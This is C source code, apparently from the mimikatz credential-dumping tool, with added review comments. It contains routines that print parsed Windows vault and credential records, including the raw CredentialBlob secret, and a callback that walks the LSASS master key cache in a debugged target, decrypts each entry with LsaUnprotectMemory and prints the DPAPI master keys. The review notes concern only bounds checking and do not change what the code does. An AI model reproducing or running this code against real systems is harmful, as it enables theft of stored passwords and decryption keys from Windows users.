/*
 * Converts *pFileTime with FileTimeToLocalFileTime and hands the result to
 * kull_m_string_displayFileTime.
 *
 * pFileTime - time stamp to convert; NULL is accepted and produces no output.
 *
 * Nothing is displayed when the conversion fails, and the failure is not
 * reported to the caller.
 */
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime)
{
	FILETIME localTime;

	if(!pFileTime)
		return;
	if(!FileTimeToLocalFileTime(pFileTime, &localTime))
		return;
	kull_m_string_displayFileTime(&localTime);
}
/*
 * Writes one parsed vault credential record through kprintf, field by field.
 *
 * level      - nesting depth; every line is padded with "%*s" using a field
 *              width of level << 1, and attributes are printed at level + 1.
 * credential - record to print; when NULL only the banner line is written.
 *
 * NOTE(review): dwAttributesMapSize and __cbElements bound the two loops and
 * are used exactly as stored in the record, and attributesMap / attributes
 * are dereferenced without a NULL check in this function. Presumably the code
 * that built the record validated them against the blob size - confirm,
 * since the record may originate from a file this process did not write.
 */
void kull_m_cred_vault_credential_descr(DWORD level, PKULL_M_CRED_VAULT_CREDENTIAL credential)
{
	const DWORD pad = level << 1;
	DWORD idx;

	kprintf(L"%*s" L"**VAULT CREDENTIAL**\n", pad, L"");
	if(!credential)
		return;

	kprintf(L"%*s" L" SchemaId : ", pad, L"");
	kull_m_string_displayGUID(&credential->SchemaId);
	kprintf(L"\n");

	kprintf(L"%*s" L" unk0 : %08x - %u\n", pad, L"", credential->unk0, credential->unk0);

	kprintf(L"%*s" L" LastWritten : ", pad, L"");
	kull_m_string_displayFileTime(&credential->LastWritten);
	kprintf(L"\n");

	kprintf(L"%*s" L" unk1 : %08x - %u\n", pad, L"", credential->unk1, credential->unk1);
	kprintf(L"%*s" L" unk2 : %08x - %u\n", pad, L"", credential->unk2, credential->unk2);
	kprintf(L"%*s" L" FriendlyName : %s\n", pad, L"", credential->FriendlyName);
	kprintf(L"%*s" L" dwAttributesMapSize : %08x - %u\n", pad, L"", credential->dwAttributesMapSize, credential->dwAttributesMapSize);

	/* The map size is a byte count; dividing by the entry size gives the number of entries. */
	idx = 0;
	while(idx < (credential->dwAttributesMapSize / sizeof(KULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE_MAP)))
	{
		kprintf(L"%*s" L" * Attribute %3u @ offset %08x - %u (unk %08x - %u)\n", pad, L"",
			credential->attributesMap[idx].id,
			credential->attributesMap[idx].offset, credential->attributesMap[idx].offset,
			credential->attributesMap[idx].unk, credential->attributesMap[idx].unk);
		idx++;
	}

	/* Each attribute is described one nesting level deeper than the record. */
	idx = 0;
	while(idx < credential->__cbElements)
	{
		kull_m_cred_vault_credential_attribute_descr(level + 1, credential->attributes[idx]);
		idx++;
	}

	kprintf(L"\n");
}
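/*
 * Writes every field of a parsed credential blob through kprintf.
 *
 * level - nesting depth; every line is padded with "%*s" using a field width
 *         of level << 1, and the attribute list is printed at level + 1.
 * cred  - blob to print; when NULL only the banner line is written.
 *
 * The CredentialBlob bytes are written to the output: as text when
 * kull_m_string_suspectUnicodeString accepts them, otherwise as a hex dump.
 *
 * NOTE(review): CredentialBlobSize is narrowed to USHORT to fit
 * UNICODE_STRING.Length. If the field is wider than 16 bits, a blob of
 * 64 KiB or more would be shown with a wrapped length - confirm the parser
 * bounds it.
 */
void kull_m_cred_descr(DWORD level, PKULL_M_CRED_BLOB cred)
{
	UNICODE_STRING uString;

	kprintf(L"%*s" L"**CREDENTIAL**\n", level << 1, L"");
	if(cred)
	{
		kprintf(L"%*s" L" credFlags : %08x - %u\n", level << 1, L"", cred->credFlags, cred->credFlags);
		kprintf(L"%*s" L" credSize : %08x - %u\n", level << 1, L"", cred->credSize, cred->credSize);
		kprintf(L"%*s" L" credUnk0 : %08x - %u\n\n", level << 1, L"", cred->credUnk0, cred->credUnk0);

		kprintf(L"%*s" L" Type : %08x - %u\n", level << 1, L"", cred->Type, cred->Type);
		kprintf(L"%*s" L" Flags : %08x - %u\n", level << 1, L"", cred->Flags, cred->Flags);
		kprintf(L"%*s" L" LastWritten : ", level << 1, L"");
		kull_m_string_displayFileTime(&cred->LastWritten);
		kprintf(L"\n");
		kprintf(L"%*s" L" unkFlagsOrSize : %08x - %u\n", level << 1, L"", cred->unkFlagsOrSize, cred->unkFlagsOrSize);
		kprintf(L"%*s" L" Persist : %08x - %u\n", level << 1, L"", cred->Persist, cred->Persist);
		kprintf(L"%*s" L" AttributeCount : %08x - %u\n", level << 1, L"", cred->AttributeCount, cred->AttributeCount);
		kprintf(L"%*s" L" unk0 : %08x - %u\n", level << 1, L"", cred->unk0, cred->unk0);
		kprintf(L"%*s" L" unk1 : %08x - %u\n", level << 1, L"", cred->unk1, cred->unk1);
		kprintf(L"%*s" L" TargetName : %s\n", level << 1, L"", cred->TargetName);
		kprintf(L"%*s" L" TargetAlias : %s\n", level << 1, L"", cred->TargetAlias);
		kprintf(L"%*s" L" Comment : %s\n", level << 1, L"", cred->Comment);
		kprintf(L"%*s" L" UnkData : %s\n", level << 1, L"", cred->UnkData);
		kprintf(L"%*s" L" UserName : %s\n", level << 1, L"", cred->UserName);

		/* Wrap the raw blob in a counted string so it can be printed with %wZ without relying on a terminator. */
		kprintf(L"%*s" L" CredentialBlob : ", level << 1, L"");
		uString.Length = uString.MaximumLength = (USHORT) cred->CredentialBlobSize;
		uString.Buffer = (PWSTR) cred->CredentialBlob;
		if(kull_m_string_suspectUnicodeString(&uString))
			kprintf(L"%wZ", &uString);
		else
			kull_m_string_wprintf_hex(uString.Buffer, uString.Length, 1);
		kprintf(L"\n");

		/* The format string has no conversion for a count, so the surplus AttributeCount argument is no longer passed. */
		kprintf(L"%*s" L" Attributes : ", level << 1, L"");
		kull_m_cred_attributes_descr(level + 1, cred->Attributes, cred->AttributeCount);
	}
}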
/*
 * Per-logon-session callback: walks the linked list whose head is at
 * pMasterKeyCacheList in the debugged target and, for each entry whose
 * LogonId equals pData->LogonId, prints the entry's GUID, insert time and key
 * bytes.
 *
 * pMasterKeyCacheList - target address of the list head; also the sentinel
 *                       that ends the walk.
 * pData               - session being enumerated; only LogonId is read here.
 *
 * All target memory is fetched with ReadMemory. Prints "KO" when the list
 * head cannot be read; a failed read of an entry silently ends the walk.
 *
 * NOTE(review): keySize and the Flink chain are taken from target memory as
 * found. keySize sizes both the allocation and the second read without an
 * upper bound, and the walk has no iteration cap, so a malformed or hostile
 * dump can make this loop or allocate at will - confirm whether callers only
 * ever open trusted targets.
 */
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
	KIWI_MASTERKEY_CACHE_ENTRY entry;
	ULONG_PTR current;
	ULONG shown = 0;
	PBYTE keyCopy;

	/* Only the LIST_ENTRY part of the head is read; it is enough to get the first Flink. */
	if(!ReadMemory(pMasterKeyCacheList, &entry, sizeof(LIST_ENTRY), NULL))
	{
		dprintf("KO");
		return;
	}

	for(current = (ULONG_PTR) entry.Flink; current != pMasterKeyCacheList; current = (ULONG_PTR) entry.Flink)
	{
		if(!ReadMemory(current, &entry, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
			break;

		/* Entries that belong to other logon sessions are skipped. */
		if(!RtlEqualLuid(pData->LogonId, &entry.LogonId))
			continue;

		dprintf("\n\t [%08x]\n\t * GUID :\t", shown++);
		kull_m_string_displayGUID(&entry.KeyUid);
		dprintf("\n\t * Time :\t");
		kull_m_string_displayFileTime(&entry.insertTime);

		keyCopy = (PBYTE) LocalAlloc(LPTR, entry.keySize);
		if(!keyCopy)
			continue;

		/* The key bytes sit at the `key` member of the entry in the target, so they are read separately with their own length. */
		if(ReadMemory(current + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), keyCopy, entry.keySize, NULL))
		{
			kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(keyCopy, entry.keySize);
			dprintf("\n\t * MasterKey :\t");
			kull_m_string_dprintf_hex(keyCopy, entry.keySize, 0);
		}
		LocalFree(keyCopy);
	}
}